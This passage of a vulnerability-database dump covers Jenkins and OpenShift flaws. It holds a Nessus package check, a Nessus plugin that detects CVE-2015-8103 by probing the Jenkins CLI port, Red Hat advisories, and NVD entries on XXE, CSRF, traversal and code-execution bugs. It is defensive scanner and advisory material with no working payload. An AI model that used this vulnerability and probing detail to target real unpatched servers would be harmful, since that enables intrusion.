reference:\"nodejs-error-ex-1.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-es6-promise-3.0.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-event-stream-3.3.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-expand-brackets-0.1.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-expand-range-1.8.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-extglob-0.3.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-filename-regex-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-fill-range-2.2.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-for-in-0.1.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-for-own-0.1.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-from-0.1.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-glob-base-0.3.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-glob-parent-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-got-5.2.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-graceful-fs-4.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ini-1.1.0-6.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-binary-path-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-dotfile-1.0.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-equal-shallow-0.1.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-extendable-0.1.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-extglob-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-glob-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-npm-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-number-2.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-plain-obj-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-primitive-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-redirect-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-stream-1.0.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-isobject-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-kind-of-3.0.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-latest-version-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lazy-cache-1.0.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.assign-3.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.baseassign-3.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.basecopy-3.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.bindcallback-3.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.createassigner-3.1.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.defaults-3.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.getnative-3.9.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.isarguments-3.0.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.isarray-3.0.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.isiterateecall-3.0.9-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.keys-3.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.restparam-3.6.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lowercase-keys-1.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-map-stream-0.1.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-micromatch-2.3.5-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-mkdirp-0.5.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-node-status-codes-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-nodemon-1.8.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-normalize-path-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-object-assign-4.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-object.omit-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-optimist-0.4.0-5.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-os-homedir-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-os-tmpdir-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-osenv-0.1.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-package-json-2.3.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-parse-glob-3.0.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-parse-json-2.2.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-pause-stream-0.0.11-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-pinkie-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-pinkie-promise-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-prepend-http-1.0.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-preserve-0.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ps-tree-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-randomatic-1.1.5-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-rc-1.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-read-all-stream-3.0.1-3.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-readdirp-2.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-regex-cache-0.4.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-registry-url-3.0.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-repeat-element-1.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-semver-5.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-semver-diff-2.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-slide-1.1.5-3.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-split-0.3.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-stream-combiner-0.2.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-string-length-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-strip-json-comments-1.0.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-success-symbol-0.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-through-2.3.4-4.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-timed-out-2.0.0-3.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-touch-1.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-undefsafe-0.0.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-unzip-response-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-update-notifier-0.6.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-url-parse-lax-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-uuid-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-write-file-atomic-1.1.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-xdg-basedir-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nss_wrapper-1.0.3-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nss_wrapper-debuginfo-1.0.3-1.el7\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-docs-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-docs-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-filter-plugins-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-filter-plugins-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-lookup-plugins-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-lookup-plugins-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-playbooks-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-playbooks-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-roles-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-roles-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-debuginfo-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-devel-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"openvswitch-test-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"origin-kibana-0.5.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"python-openvswitch-2.4.0-1.el7\")) flag++;\n if (rpm_exists(rpm:\"tuned-profiles-atomic-openshift-node-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tuned-profiles-atomic-openshift-node-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"atomic-openshift / atomic-openshift-clients / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T02:48:06", "bulletinFamily": "scanner", "description": "The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is prior to 1.638 or 1.625.2. It is, therefore, affected by a\nflaw in the Apache Commons Collections (ACC) library that allows the\ndeserialization of unauthenticated Java objects. An unauthenticated,\nremote attacker can exploit this to execute arbitrary code on the\ntarget host.", "modified": "2019-11-02T00:00:00", "id": "JENKINS_SECURITY218.NASL", "href": "https://www.tenable.com/plugins/nessus/86898", "published": "2015-11-17T00:00:00", "title": "Jenkins < 1.638 / 1.625.2 Java Object Deserialization RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86898);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2015-8103\");\n script_bugtraq_id(77636);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Jenkins < 1.638 / 1.625.2 Java Object Deserialization RCE\");\n script_summary(english:\"Checks the Jenkins version, and if necessary, tests if the CLI port is enabled.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is prior to 1.638 or 1.625.2. It is, therefore, affected by a\nflaw in the Apache Commons Collections (ACC) library that allows the\ndeserialization of unauthenticated Java objects. An unauthenticated,\nremote attacker can exploit this to execute arbitrary code on the\ntarget host.\");\n # https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execution-0-day-jenkins-cli\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0316bc02\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jenkinsci-cert/SECURITY-218\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/COLLECTIONS-580\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jenkins version 1.638 / 1.625.2 or later. Alternatively,\ndisable the CLI port per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8103\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\");\n script_require_keys(\"www/Jenkins\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\nget_kb_item_or_exit(\"www/Jenkins/\"+port+\"/Installed\");\n\n# LTS has a different version number\nis_LTS = get_kb_item(\"www/Jenkins/\"+port+\"/is_LTS\");\nif (is_LTS)\n{\n appname = \"Jenkins Open Source LTS\";\n fixed = \"1.625.2\";\n}\nelse\n{\n appname = \"Jenkins Open Source\";\n fixed = \"1.638\";\n}\n\n# check the patched versions\nversion = get_kb_item_or_exit(\"www/Jenkins/\"+port+\"/JenkinsVersion\");\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_APP_VER, appname);\nif (ver_compare(ver: version, fix: fixed, strict: FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\n# if the version is less than the patch version then check to see if the CLI port is enabled\nurl = build_url(qs:'/', port: port);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif ((\"X-Jenkins-CLI-Port\" >!< res[1]) &&\n (\"X-Jenkins-CLI2-Port\" >!< res[1]) &&\n (\"X-Hudson-CLI-Port\" >!< res[1])) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\n# Find a CLI port to examine\nitem = eregmatch(pattern:\"X-Jenkins-CLI-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\nif (isnull(item))\n{\n item = eregmatch(pattern:\"X-Hudson-CLI-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\n if (isnull(item))\n {\n item = eregmatch(pattern:\"X-Jenkins-CLI2-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\n if (isnull(item)) audit(AUDIT_RESP_BAD, port);\n }\n}\n\nsock = open_sock_tcp(item[1]);\nif (!sock) audit(AUDIT_NOT_LISTEN, appname, item[1]);\n\nsend(socket: sock, data: '\\x00\\x14' + \"Protocol:CLI-connect\");\nreturn_val = recv(socket: sock, length: 20, min: 9, timeout: 1);\nclose(sock);\n\nif (isnull(return_val) || len(return_val) < 9) audit(AUDIT_RESP_BAD, res[1]);\nif (\"Unknown protocol:\" >< return_val) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\nelse if (\"Welcome\" >!< return_val) audit(AUDIT_RESP_BAD, res[1]);\n\nif (report_verbosity > 0)\n{ \n report =\n '\\n Port : ' + item[1] +\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port: item[1], extra: report);\n}\nelse security_hole(item[1]);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2016-03-23T16:40:08", "bulletinFamily": "unix", "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issue is addressed with this release:\n\nIt was found that ActiveMQ did not safely handle user supplied data \nwhen deserializing objects. A remote attacker could use this flaw to \nexecute arbitrary code with the permissions of the ActiveMQ \napplication. (CVE-2015-5254)\n\nAn update for Jenkins Continuous Integration Server that addresses a \nlarge number of security issues including XSS, CSRF, information \ndisclosure and code execution have been addressed as well. \n(CVE-2015-5317, CVE-2015-5318, CVE-2015-5319, CVE-2015-5320, \nCVE-2015-5321, CVE-2015-5322, CVE-2015-5323, CVE-2015-5324, \nCVE-2015-5325, CVE-2015-5326, CVE-2015-7537, CVE-2015-7538, \nCVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes in this advisory. See\nthe OpenShift Enterprise Technical Notes, which will be updated\nshortly for release 2.2.9, for details about these changes:\n\nhttps://access.redhat.com/documentation/en-US/OpenShift_Enterprise/2/html-single/Technical_Notes/index.html\n\nAll OpenShift Enterprise 2 users are advised to upgrade to these \nupdated packages.\n", "modified": "2016-03-23T19:16:50", "published": "2016-01-11T05:00:00", "id": "RHSA-2016:22381", "href": "https://access.redhat.com/errata/RHSA-2016:22381", "type": "redhat", "title": "(RHSA-2016:22381) Important: Red Hat OpenShift Enterprise 2.2.9 security, bug fix, and enhancement update", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issue is addressed with this release:\n\nIt was found that ActiveMQ did not safely handle user supplied data \nwhen deserializing objects. A remote attacker could use this flaw to \nexecute arbitrary code with the permissions of the ActiveMQ \napplication. (CVE-2015-5254)\n\nAn update for Jenkins Continuous Integration Server that addresses a \nlarge number of security issues including XSS, CSRF, information \ndisclosure and code execution have been addressed as well. \n(CVE-2015-5317, CVE-2015-5318, CVE-2015-5319, CVE-2015-5320, \nCVE-2015-5321, CVE-2015-5322, CVE-2015-5323, CVE-2015-5324, \nCVE-2015-5325, CVE-2015-5326, CVE-2015-7537, CVE-2015-7538, \nCVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes in this advisory. See\nthe OpenShift Enterprise Technical Notes, which will be updated\nshortly for release 2.2.9, for details about these changes:\n\nhttps://access.redhat.com/documentation/en-US/OpenShift_Enterprise/2/html-single/Technical_Notes/index.html\n\nAll OpenShift Enterprise 2 users are advised to upgrade to these \nupdated packages.\n", "modified": "2018-06-07T08:58:09", "published": "2016-03-22T04:00:00", "id": "RHSA-2016:0489", "href": "https://access.redhat.com/errata/RHSA-2016:0489", "type": "redhat", "title": "(RHSA-2016:0489) Important: Red Hat OpenShift Enterprise 2.2.9 security, bug fix, and enhancement update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "description": "OpenShift Enterprise by Red Hat is the company's cloud computing \nPlatform-as-a-Service (PaaS) solution designed for on-premise or \nprivate cloud deployments.\n\nThe following security issues are addressed with this release:\n\nAn authorization flaw was discovered in Kubernetes; the API server \ndid not properly check user permissions when handling certain \nrequests. An authenticated remote attacker could use this flaw to \ngain additional access to resources such as RAM and disk space. \n(CVE-2016-1905)\n\nAn authorization flaw was discovered in Kubernetes; the API server \ndid not properly check user permissions when handling certain build-\nconfiguration strategies. A remote attacker could create build \nconfigurations with strategies that violate policy. Although the \nattacker could not launch the build themselves (launch fails when \nthe policy is violated), if the build configuration files were later \nlaunched by other privileged services (such as automated triggers), \nuser privileges could be bypassed allowing attacker escalation. \n(CVE-2016-1906)\n\nAn update for Jenkins Continuous Integration Server that addresses a \nlarge number of security issues including XSS, CSRF, information \ndisclosure and code execution have been addressed as well. \n(CVE-2013-2186, CVE-2014-1869, CVE-2014-3661, CVE-2014-3662\nCVE-2014-3663, CVE-2014-3664, CVE-2014-3666, CVE-2014-3667\nCVE-2014-3680, CVE-2014-3681, CVE-2015-1806, CVE-2015-1807\nCVE-2015-1808, CVE-2015-1810, CVE-2015-1812, CVE-2015-1813\nCVE-2015-1814, CVE-2015-5317, CVE-2015-5318, CVE-2015-5319\nCVE-2015-5320, CVE-2015-5321, CVE-2015-5322, CVE-2015-5323\nCVE-2015-5324, CVE-2015-5325, CVE-2015-5326 ,CVE-2015-7537\nCVE-2015-7538, CVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes and enhancements in \nthis advisory. See the OpenShift Enterprise 3.1 Release Notes, which \nwill be updated shortly for release 3.1.1, for details about these \nchanges:\n\nhttps://docs.openshift.com/enterprise/3.1/release_notes/ose_3_1_release_notes.html\n\nAll OpenShift Enterprise 3 users are advised to upgrade to these \nupdated packages.", "modified": "2016-01-27T00:08:42", "published": "2016-01-27T00:01:15", "id": "RHSA-2016:0070", "href": "https://access.redhat.com/errata/RHSA-2016:0070", "type": "redhat", "title": "(RHSA-2016:0070) Important: Red Hat OpenShift Enterprise 3.1.1 bug fix and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to list directory contents and read arbitrary files in the Jenkins servlet resources via directory traversal sequences in a request to jnlpJars/.", "modified": "2016-06-14T00:49:00", "id": "CVE-2015-5322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5322", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5322", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Jenkins before 1.638 and LTS before 1.625.2 do not properly restrict access to API tokens which might allow remote administrators to gain privileges and run scripts by using an API token of another user.", "modified": "2016-06-14T00:48:00", "id": "CVE-2015-5323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5323", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5323", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "The Plugins Manager in Jenkins before 1.640 and LTS before 1.625.2 does not verify checksums for plugin files referenced in update site data, which makes it easier for man-in-the-middle attackers to execute arbitrary code via a crafted plugin.", "modified": "2016-06-14T00:09:00", "id": "CVE-2015-7539", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7539", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7539", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "XML external entity (XXE) vulnerability in the create-job CLI command in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to read arbitrary files via a crafted job configuration that is then used in an \"XML-aware tool,\" as demonstrated by get-job and update-job.\n<a href=\"https://cwe.mitre.org/data/definitions/611.html\">CWE-611: Improper Restriction of XML External Entity Reference ('XXE')</a>", "modified": "2016-06-15T17:13:00", "id": "CVE-2015-5319", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5319", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5319", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Jenkins before 1.638 and LTS before 1.625.2 allow attackers to bypass intended slave-to-master access restrictions by leveraging a JNLP slave. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-3665.", "modified": "2016-06-14T00:19:00", "id": "CVE-2015-5325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5325", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5325", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Jenkins before 1.640 and LTS before 1.625.2 allow remote attackers to bypass the CSRF protection mechanism via unspecified vectors.", "modified": "2016-06-14T00:10:00", "id": "CVE-2015-7538", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7538", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7538", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:44", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in Jenkins before 1.640 and LTS before 1.625.2 allows remote attackers to hijack the authentication of administrators for requests that have unspecified impact via vectors related to the HTTP GET method.", "modified": "2016-06-14T00:13:00", "id": "CVE-2015-7537", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7537", "published": "2016-02-03T18:59:00", "title": "CVE-2015-7537", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Jenkins before 1.638 and LTS before 1.625.2 allow remote attackers to obtain sensitive information via a direct request to queue/api.", "modified": "2016-06-14T00:20:00", "id": "CVE-2015-5324", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5324", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5324", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": 